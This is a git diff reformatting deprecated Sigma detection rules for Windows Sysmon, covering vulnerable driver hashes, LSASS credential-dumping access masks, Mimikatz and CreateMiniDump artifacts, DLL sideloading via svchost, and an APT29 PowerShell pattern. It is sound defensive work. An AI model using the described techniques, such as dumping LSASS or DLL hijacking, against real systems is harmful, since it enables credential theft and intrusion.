4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1 + - md5: a179c4093d05a3e1ee73f6ff07f994aa + - sha1: 5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4 + - sha256: 4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1 driver_img: ImageLoaded|endswith: \aswArPot.sys driver_status: - - Signed: 'false' - - SignatureStatus: Expired + - Signed: 'false' + - SignatureStatus: Expired condition: driver_load and (1 of selection* or all of driver_*) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_dell_driver.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_dell_driver.yml index 57ae0dda7..60c4d1e07 100644 --- a/sigma/sysmon/deprecated/driver_load_win_vuln_dell_driver.yml +++ b/sigma/sysmon/deprecated/driver_load_win_vuln_dell_driver.yml @@ -1,8 +1,7 @@ title: Vulnerable Dell BIOS Update Driver Load id: 21b23707-60d6-41bb-96e3-0f0481b0fed9 status: deprecated -description: Detects the load of the vulnerable Dell BIOS update driver as reported - in CVE-2021-21551 +description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551 references: - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ author: Florian Roth (Nextron Systems) @@ -32,15 +31,15 @@ detection: - MD5=C996D7971C49252C582171D9380360F2 - MD5=D2FD132AB7BBC6BBB87A84F026FA0244 selection_hash: - - sha256: - - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5 - - ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1 - - sha1: - - c948ae14761095e4d76b55d9de86412258be7afd - - 10b30bdee43b3a2ec4aa63375577ade650269d25 - - md5: - - c996d7971c49252c582171d9380360f2 - - d2fd132ab7bbc6bbb87a84f026fa0244 + - sha256: + - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5 + - ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1 + - sha1: + - c948ae14761095e4d76b55d9de86412258be7afd + - 10b30bdee43b3a2ec4aa63375577ade650269d25 + - md5: + - c996d7971c49252c582171d9380360f2 + - d2fd132ab7bbc6bbb87a84f026fa0244 condition: driver_load and (1 of selection*) falsepositives: - Legitimate BIOS driver updates (should be rare) diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_drivers_names.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_drivers_names.yml index 53c1df8c3..34c05546b 100644 --- a/sigma/sysmon/deprecated/driver_load_win_vuln_drivers_names.yml +++ b/sigma/sysmon/deprecated/driver_load_win_vuln_drivers_names.yml @@ -1,8 +1,8 @@ title: Vulnerable Driver Load By Name id: 39b64854-5497-4b57-a448-40977b8c9679 related: - - id: 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8 - type: derived + - id: 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8 + type: derived status: deprecated description: Detects the load of known vulnerable drivers via their names only. references: @@ -366,10 +366,7 @@ detection: - \amsdk.sys condition: driver_load and selection falsepositives: - - False positives may occur if one of the vulnerable driver names mentioned above - didn't change its name between versions. So always make sure that the driver - being loaded is the legitimate one and the non-vulnerable version. - - If you experience a lot of FP you could comment the driver name or its exact - known legitimate location (when possible) + - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non-vulnerable version. + - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible) level: low ruletype: Sigma diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_gigabyte_driver.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_gigabyte_driver.yml index 14a5fa33b..01cf838db 100644 --- a/sigma/sysmon/deprecated/driver_load_win_vuln_gigabyte_driver.yml +++ b/sigma/sysmon/deprecated/driver_load_win_vuln_gigabyte_driver.yml @@ -1,8 +1,7 @@ title: Vulnerable GIGABYTE Driver Load id: 7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647 status: deprecated -description: Detects the load of a signed and vulnerable GIGABYTE driver often used - by threat actors or malware for privilege escalation +description: Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation references: - https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b - https://twitter.com/malmoeb/status/1551449425842786306 @@ -32,15 +31,15 @@ detection: - SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427 - SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B selection_other: - - md5: - - 9ab9f3b75a2eb87fafb1b7361be9dfb3 - - c832a4313ff082258240b61b88efa025 - - sha1: - - fe10018af723986db50701c8532df5ed98b17c39 - - 1f1ce28c10453acbc9d3844b4604c59c0ab0ad46 - - sha256: - - 31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427 - - cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b + - md5: + - 9ab9f3b75a2eb87fafb1b7361be9dfb3 + - c832a4313ff082258240b61b88efa025 + - sha1: + - fe10018af723986db50701c8532df5ed98b17c39 + - 1f1ce28c10453acbc9d3844b4604c59c0ab0ad46 + - sha256: + - 31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427 + - cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b condition: driver_load and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_hw_driver.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_hw_driver.yml index 94aca85ed..8e812fe5b 100644 --- a/sigma/sysmon/deprecated/driver_load_win_vuln_hw_driver.yml +++ b/sigma/sysmon/deprecated/driver_load_win_vuln_hw_driver.yml @@ -1,8 +1,7 @@ title: Vulnerable HW Driver Load id: 9bacc538-d1b9-4d42-862e-469eafc05a41 status: deprecated -description: Detects the load of a legitimate signed driver named HW.sys by often - used by threat actors or malware for privilege escalation +description: Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation references: - https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/ - https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details @@ -34,18 +33,18 @@ detection: - MD5=376B1E8957227A3639EC1482900D9B97 - MD5=45C2D133D41D2732F3653ED615A745C8 selection_other: - - sha256: - - 4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8 - - 55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa - - 6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5 - - sha1: - - 74e4e3006b644392f5fcea4a9bae1d9d84714b57 - - 18f34a0005e82a9a1556ba40b997b0eae554d5fd - - 4e56e0b1d12664c05615c69697a2f5c5d893058a - - md5: - - 3247014ba35d406475311a2eab0c4657 - - 376b1e8957227a3639ec1482900d9b97 - - 45c2d133d41d2732f3653ed615a745c8 + - sha256: + - 4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8 + - 55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa + - 6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5 + - sha1: + - 74e4e3006b644392f5fcea4a9bae1d9d84714b57 + - 18f34a0005e82a9a1556ba40b997b0eae554d5fd + - 4e56e0b1d12664c05615c69697a2f5c5d893058a + - md5: + - 3247014ba35d406475311a2eab0c4657 + - 376b1e8957227a3639ec1482900d9b97 + - 45c2d133d41d2732f3653ed615a745c8 condition: driver_load and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_lenovo_driver.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_lenovo_driver.yml index e4c925f73..565a22650 100644 --- a/sigma/sysmon/deprecated/driver_load_win_vuln_lenovo_driver.yml +++ b/sigma/sysmon/deprecated/driver_load_win_vuln_lenovo_driver.yml @@ -1,8 +1,7 @@ title: Vulnerable Lenovo Driver Load id: ac683a42-877b-4ff8-91ac-69e94b0f70b4 status: deprecated -description: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 - which can be used to escalate privileges +description: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges references: - https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities - https://github.com/alfarom256/CVE-2022-3699/ @@ -27,9 +26,9 @@ detection: - SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F - MD5=B941C8364308990EE4CC6EADF7214E0F selection_hash: - - sha256: f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe - - sha1: b89a8eef5aeae806af5ba212a8068845cafdab6f - - md5: b941c8364308990ee4cc6eadf7214e0f + - sha256: f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe + - sha1: b89a8eef5aeae806af5ba212a8068845cafdab6f + - md5: b941c8364308990ee4cc6eadf7214e0f condition: driver_load and (1 of selection*) falsepositives: - Legitimate driver loads (old driver that didn't receive an update) diff --git a/sigma/sysmon/deprecated/file_event_win_hktl_createminidump.yml b/sigma/sysmon/deprecated/file_event_win_hktl_createminidump.yml index 7fa552b27..eba0e963c 100644 --- a/sigma/sysmon/deprecated/file_event_win_hktl_createminidump.yml +++ b/sigma/sysmon/deprecated/file_event_win_hktl_createminidump.yml @@ -2,10 +2,9 @@ title: CreateMiniDump Hacktool id: db2110f3-479d-42a6-94fb-d35bc1e46492 status: deprecated related: - - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d - type: derived -description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process - memory for credential extraction on the attacker's machine + - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d + type: derived +description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine author: Florian Roth (Nextron Systems) references: - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass diff --git a/sigma/sysmon/deprecated/file_event_win_lsass_memory_dump_file_creation.yml b/sigma/sysmon/deprecated/file_event_win_lsass_memory_dump_file_creation.yml index c7070ed5b..c8d836fca 100644 --- a/sigma/sysmon/deprecated/file_event_win_lsass_memory_dump_file_creation.yml +++ b/sigma/sysmon/deprecated/file_event_win_lsass_memory_dump_file_creation.yml @@ -1,8 +1,7 @@ title: LSASS Memory Dump File Creation id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a status: deprecated -description: LSASS memory dump creation using operating systems utilities. Procdump - will use process name in output file if no name is specified +description: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community @@ -27,8 +26,7 @@ fields: - ComputerName - TargetFilename falsepositives: - - Dumping lsass memory for forensic investigation purposes by legitimate incident - responder or forensic invetigator + - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator - Dumps of another process that contains lsass in its process name (substring) level: high ruletype: Sigma diff --git a/sigma/sysmon/deprecated/file_event_win_mimikatz_memssp_log_file.yml b/sigma/sysmon/deprecated/file_event_win_mimikatz_memssp_log_file.yml index b8056302d..f9f591ab0 100644 --- a/sigma/sysmon/deprecated/file_event_win_mimikatz_memssp_log_file.yml +++ b/sigma/sysmon/deprecated/file_event_win_mimikatz_memssp_log_file.yml @@ -1,8 +1,8 @@ title: Mimikatz MemSSP Default Log File Creation id: 034affe8-6170-11ec-844f-0f78aa0c4d66 related: - - id: 9e099d99-44c2-42b6-a6d8-54c3545cab29 - type: similar + - id: 9e099d99-44c2-42b6-a6d8-54c3545cab29 # Replacement for this rule + type: similar status: deprecated description: Detects Mimikatz MemSSP default log file creation references: diff --git a/sigma/sysmon/deprecated/file_event_win_susp_clr_logs.yml b/sigma/sysmon/deprecated/file_event_win_susp_clr_logs.yml index b084b4742..4aa0cbd24 100644 --- a/sigma/sysmon/deprecated/file_event_win_susp_clr_logs.yml +++ b/sigma/sysmon/deprecated/file_event_win_susp_clr_logs.yml @@ -1,8 +1,7 @@ title: Suspicious CLR Logs Creation id: e4b63079-6198-405c-abd7-3fe8b0ce3263 status: deprecated -description: Detects suspicious .NET assembly executions. Could detect using Cobalt - Strike's command execute-assembly. +description: Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly. references: - https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/ @@ -19,8 +18,7 @@ tags: logsource: category: file_event product: windows - definition: Check your sysmon configuration for monitoring UsageLogs folder. In - SwiftOnSecurity configuration we have that thanks @SBousseaden + definition: Check your sysmon configuration for monitoring UsageLogs folder. In SwiftOnSecurity configuration we have that thanks @SBousseaden detection: file_event: EventID: 11 @@ -39,7 +37,6 @@ detection: - svchost condition: file_event and selection falsepositives: - - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and - msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675 + - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675 level: high ruletype: Sigma diff --git a/sigma/sysmon/deprecated/image_load_alternate_powershell_hosts_moduleload.yml b/sigma/sysmon/deprecated/image_load_alternate_powershell_hosts_moduleload.yml index 7104564e5..101cb9eed 100644 --- a/sigma/sysmon/deprecated/image_load_alternate_powershell_hosts_moduleload.yml +++ b/sigma/sysmon/deprecated/image_load_alternate_powershell_hosts_moduleload.yml @@ -1,8 +1,7 @@ title: Alternate PowerShell Hosts - Image id: fe6e002f-f244-4278-9263-20e4b593827f status: deprecated -description: Detects alternate PowerShell hosts potentially bypassing detections looking - for powershell.exe +description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) @@ -23,17 +22,18 @@ detection: Description: System.Management.Automation ImageLoaded|contains: System.Management.Automation filter_generic: - - Image|endswith: - - \powershell.exe - - \mscorsvw.exe - - Image|startswith: - - C:\Program Files (x86)\Microsoft Visual Studio\ - - C:\Program Files\Microsoft Visual Studio\ - - C:\Windows\System32\ - - C:\Program Files\Citrix\ConfigSync\ - - Image: C:\Program Files\PowerShell\7\pwsh.exe + - Image|endswith: + - \powershell.exe + - \mscorsvw.exe + - Image|startswith: + - C:\Program Files (x86)\Microsoft Visual Studio\ + - C:\Program Files\Microsoft Visual Studio\ + - C:\Windows\System32\ + - C:\Program Files\Citrix\ConfigSync\ + - Image: C:\Program Files\PowerShell\7\pwsh.exe filter_aurora: - Image: null + # This filter is to avoid a race condition FP with this specific ETW provider in aurora + Image: condition: image_load and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/image_load_side_load_advapi32.yml b/sigma/sysmon/deprecated/image_load_side_load_advapi32.yml index 46c07b07a..2d8f0537f 100644 --- a/sigma/sysmon/deprecated/image_load_side_load_advapi32.yml +++ b/sigma/sysmon/deprecated/image_load_side_load_advapi32.yml @@ -1,8 +1,7 @@ title: Suspicious Load of Advapi31.dll id: d813d662-785b-42ca-8b4a-f7457d78d5a9 status: deprecated -description: Detects the load of advapi31.dll by a process running in an uncommon - folder +description: Detects the load of advapi31.dll by a process running in an uncommon folder references: - https://github.com/hlldz/Phant0m author: frack113 diff --git a/sigma/sysmon/deprecated/image_load_side_load_scm.yml b/sigma/sysmon/deprecated/image_load_side_load_scm.yml index 238433ebd..b18723eab 100644 --- a/sigma/sysmon/deprecated/image_load_side_load_scm.yml +++ b/sigma/sysmon/deprecated/image_load_side_load_scm.yml @@ -1,11 +1,10 @@ title: SCM DLL Sideload id: bc3cc333-48b9-467a-9d1f-d44ee594ef48 related: - - id: 602a1f13-c640-4d73-b053-be9a2fa58b77 - type: similar + - id: 602a1f13-c640-4d73-b053-be9a2fa58b77 + type: similar status: deprecated -description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services - (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system +description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system references: - https://decoded.avast.io/martinchlumecky/png-steganography/ - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 diff --git a/sigma/sysmon/deprecated/image_load_side_load_svchost_dlls.yml b/sigma/sysmon/deprecated/image_load_side_load_svchost_dlls.yml index 3a98876d1..56bf5b51f 100644 --- a/sigma/sysmon/deprecated/image_load_side_load_svchost_dlls.yml +++ b/sigma/sysmon/deprecated/image_load_side_load_svchost_dlls.yml @@ -1,17 +1,10 @@ title: Svchost DLL Search Order Hijack id: 602a1f13-c640-4d73-b053-be9a2fa58b77 status: deprecated -description: 'Detects DLL sideloading of DLLs that are loaded by the SCM for some - services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system - - IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist - within C:\Windows\System32\ by default. - - An attacker can place their malicious logic within the PROCESS_ATTACH block of - their library and restart the aforementioned services "svchost.exe -k netsvcs" - to gain code execution on a remote machine. - - ' +description: | + Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system + IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. + An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine. references: - https://decoded.avast.io/martinchlumecky/png-steganography/ - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 diff --git a/sigma/sysmon/deprecated/image_load_susp_winword_wmidll_load.yml b/sigma/sysmon/deprecated/image_load_susp_winword_wmidll_load.yml index 48c3c48b0..57e57b607 100644 --- a/sigma/sysmon/deprecated/image_load_susp_winword_wmidll_load.yml +++ b/sigma/sysmon/deprecated/image_load_susp_winword_wmidll_load.yml @@ -31,6 +31,7 @@ detection: - \wbemcomn.dll - \wbemprox.dll - \wbemdisp.dll + # - '\wbemsvc.dll' # too many FPs, tested with Win11 and O365 condition: image_load and selection falsepositives: - Possible. Requires further testing. diff --git a/sigma/sysmon/deprecated/pipe_created_psexec_pipes_artifacts.yml b/sigma/sysmon/deprecated/pipe_created_psexec_pipes_artifacts.yml index 395657c03..63c123bb2 100644 --- a/sigma/sysmon/deprecated/pipe_created_psexec_pipes_artifacts.yml +++ b/sigma/sysmon/deprecated/pipe_created_psexec_pipes_artifacts.yml @@ -16,12 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/deprecated/proc_access_win_in_memory_assembly_execution.yml b/sigma/sysmon/deprecated/proc_access_win_in_memory_assembly_execution.yml index 36a9f5932..6ed97138c 100644 --- a/sigma/sysmon/deprecated/proc_access_win_in_memory_assembly_execution.yml +++ b/sigma/sysmon/deprecated/proc_access_win_in_memory_assembly_execution.yml @@ -1,24 +1,13 @@ title: Suspicious In-Memory Module Execution id: 5f113a8f-8b61-41ca-b90f-d374fa7e4a39 status: deprecated -description: 'Detects the access to processes by other suspicious processes which - have reflectively loaded libraries in their memory space. - - An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID - 10 cannot reference a stack call to a dll loaded from disk (the standard way), - - it will display "UNKNOWN" as the module name. Usually this means the stack call - points to a module that was reflectively loaded in memory. - - Adding to this, it is not common to see such few calls in the stack (ntdll.dll - --> kernelbase.dll --> unknown) which essentially means that - - most of the functions required by the process to execute certain routines are - already present in memory, not requiring any calls to external libraries. - +description: | + Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. + An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), + it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. + Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that + most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious. - - ' references: - https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/ author: Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro @@ -60,37 +49,37 @@ detection: - '0x1F3FFF' - '0x1FFFFF' filter: - - SourceImage|endswith: - - \Windows\System32\sdiagnhost.exe - - \procexp64.exe - - \procexp.exe - - \Microsoft VS Code\Code.exe - - \aurora-agent-64.exe - - \aurora-agent.exe - - \git\usr\bin\sh.exe - - \IDE\devenv.exe - - \GitHubDesktop\Update.exe - - \RuntimeBroker.exe - - \backgroundTaskHost.exe - - \GitHubDesktop.exe - - SourceImage|startswith: - - C:\Program Files (x86)\ - - C:\Program Files\ - - C:\Windows\Microsoft.NET\Framework\\*\NGenTask.exe - - C:\Program Files (x86)\Microsoft Visual Studio\ - - C:\Program Files\Microsoft Visual Studio\ - - C:\Windows\Microsoft.NET\Framework - - C:\WINDOWS\System32\DriverStore\ - - C:\Windows\System32\WindowsPowerShell\ - - SourceImage: - - C:\WINDOWS\system32\taskhostw.exe - - C:\WINDOWS\system32\ctfmon.exe - - C:\WINDOWS\system32\NhNotifSys.exe - - C:\Windows\ImmersiveControlPanel\SystemSettings.exe - - C:\Windows\explorer.exe - - TargetImage: C:\Windows\System32\RuntimeBroker.exe - - TargetImage|endswith: \Microsoft VS Code\Code.exe - - CallTrace|contains: '|C:\WINDOWS\System32\RPCRT4.dll+' + - SourceImage|endswith: + - \Windows\System32\sdiagnhost.exe + - \procexp64.exe + - \procexp.exe + - \Microsoft VS Code\Code.exe + - \aurora-agent-64.exe + - \aurora-agent.exe + - \git\usr\bin\sh.exe + - \IDE\devenv.exe + - \GitHubDesktop\Update.exe + - \RuntimeBroker.exe + - \backgroundTaskHost.exe + - \GitHubDesktop.exe + - SourceImage|startswith: + - C:\Program Files (x86)\ + - C:\Program Files\ + - C:\Windows\Microsoft.NET\Framework\\*\NGenTask.exe + - C:\Program Files (x86)\Microsoft Visual Studio\ + - C:\Program Files\Microsoft Visual Studio\ + - C:\Windows\Microsoft.NET\Framework + - C:\WINDOWS\System32\DriverStore\ + - C:\Windows\System32\WindowsPowerShell\ + - SourceImage: + - C:\WINDOWS\system32\taskhostw.exe + - C:\WINDOWS\system32\ctfmon.exe + - C:\WINDOWS\system32\NhNotifSys.exe + - C:\Windows\ImmersiveControlPanel\SystemSettings.exe + - C:\Windows\explorer.exe + - TargetImage: C:\Windows\System32\RuntimeBroker.exe + - TargetImage|endswith: \Microsoft VS Code\Code.exe + - CallTrace|contains: '|C:\WINDOWS\System32\RPCRT4.dll+' # attempt to save the rule with a broader filter filter_set_1: SourceImage: C:\WINDOWS\Explorer.EXE TargetImage: diff --git a/sigma/sysmon/deprecated/proc_access_win_lsass_susp_access.yml b/sigma/sysmon/deprecated/proc_access_win_lsass_susp_access.yml index ecb5a9220..6b7ca44d4 100644 --- a/sigma/sysmon/deprecated/proc_access_win_lsass_susp_access.yml +++ b/sigma/sysmon/deprecated/proc_access_win_lsass_susp_access.yml @@ -1,16 +1,13 @@ title: Credential Dumping Tools Accessing LSASS Memory id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d status: deprecated -description: Detects processes requesting access to LSASS memory via suspicious access - masks. This is typical for credentials dumping tools +description: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf -author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas - Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, - oscd.community +author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community date: 2017/02/16 modified: 2023/11/30 tags: @@ -30,11 +27,14 @@ detection: TargetImage|endswith: \lsass.exe GrantedAccess|startswith: - '0x40' + # - '0x1000' # minimum access requirements to query basic info from service + # - '0x1400' - '0x100000' - - '0x1410' - - '0x1438' - - '0x143a' - - '0x1418' + - '0x1410' # car.2019-04-004 + # - '0x1010' # car.2019-04-004 + - '0x1438' # car.2019-04-004 + - '0x143a' # car.2019-04-004 + - '0x1418' # car.2019-04-004 - '0x1f0fff' - '0x1f1fff' - '0x1f2fff' @@ -54,7 +54,7 @@ detection: SourceImage|startswith: - C:\ProgramData\Microsoft\Windows Defender\ - C:\Program Files\Windows Defender\ - - C:\Program Files\Microsoft Security Client\MsMpEng.exe + - C:\Program Files\Microsoft Security Client\MsMpEng.exe # Windows7 SourceImage|endswith: \MsMpEng.exe filter_defender_updates: SourceImage: C:\Windows\System32\svchost.exe @@ -118,7 +118,7 @@ detection: SourceImage|endswith: \explorer.exe GrantedAccess: '0x401' filter_mrt: - SourceImage: C:\Windows\system32\MRT.exe + SourceImage: C:\Windows\system32\MRT.exe # Windows Malicious Software Removal Tool GrantedAccess: - '0x1410' - '0x1418' @@ -127,7 +127,7 @@ detection: SourceImage|endswith: - \handle.exe - \handle64.exe - filter_edge: + filter_edge: # version in path 96.0.1054.43 SourceImage|startswith: C:\Program Files (x86)\Microsoft\Edge\Application\ SourceImage|endswith: \Installer\setup.exe filter_webex: @@ -145,9 +145,22 @@ detection: - '0x410' - '0x1410' filter_msbuild: + # This FP was generated while building CPython from source and could be related to other similar examples. + # But if you don't do that kind of stuff consider removing it from the rule ;) SourceImage|startswith: C:\Program Files\Microsoft Visual Studio\ SourceImage|endswith: \MSBuild\Current\Bin\MSBuild.exe GrantedAccess: '0x1F3FFF' + # Old - too broad filter + # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts + # - '\wmiprvse.exe' + # - '\taskmgr.exe' + # - '\procexp64.exe' + # - '\procexp.exe' + # - '\lsm.exe' + # - '\MsMpEng.exe' + # - '\csrss.exe' + # - '\wininit.exe' + # - '\vmtoolsd.exe' filter_games: SourceImage|contains: \SteamLibrary\steamapps\ condition: process_access and (selection and not 1 of filter_*) diff --git a/sigma/sysmon/deprecated/proc_access_win_pypykatz_cred_dump_lsass_access.yml b/sigma/sysmon/deprecated/proc_access_win_pypykatz_cred_dump_lsass_access.yml index add16e199..0bb13ac3b 100644 --- a/sigma/sysmon/deprecated/proc_access_win_pypykatz_cred_dump_lsass_access.yml +++ b/sigma/sysmon/deprecated/proc_access_win_pypykatz_cred_dump_lsass_access.yml @@ -25,7 +25,7 @@ detection: - C:\Windows\System32\KERNELBASE.dll+ - libffi-7.dll - _ctypes.pyd+ - - python3*.dll+ + - python3*.dll+ # Pypy requires python>=3.6 GrantedAccess: '0x1FFFFF' condition: process_access and selection falsepositives: diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_apt29_thinktanks.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_apt29_thinktanks.yml index 9bb1350b2..3402d4f2a 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_apt29_thinktanks.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_apt29_thinktanks.yml @@ -1,8 +1,7 @@ title: APT29 id: 033fe7d6-66d1-4240-ac6b-28908009c71f status: deprecated -description: This method detects a suspicious PowerShell command line combination - as used by APT29 in a campaign against U.S. think tanks. +description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks. references: - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - -noni - -ep - bypass diff --git 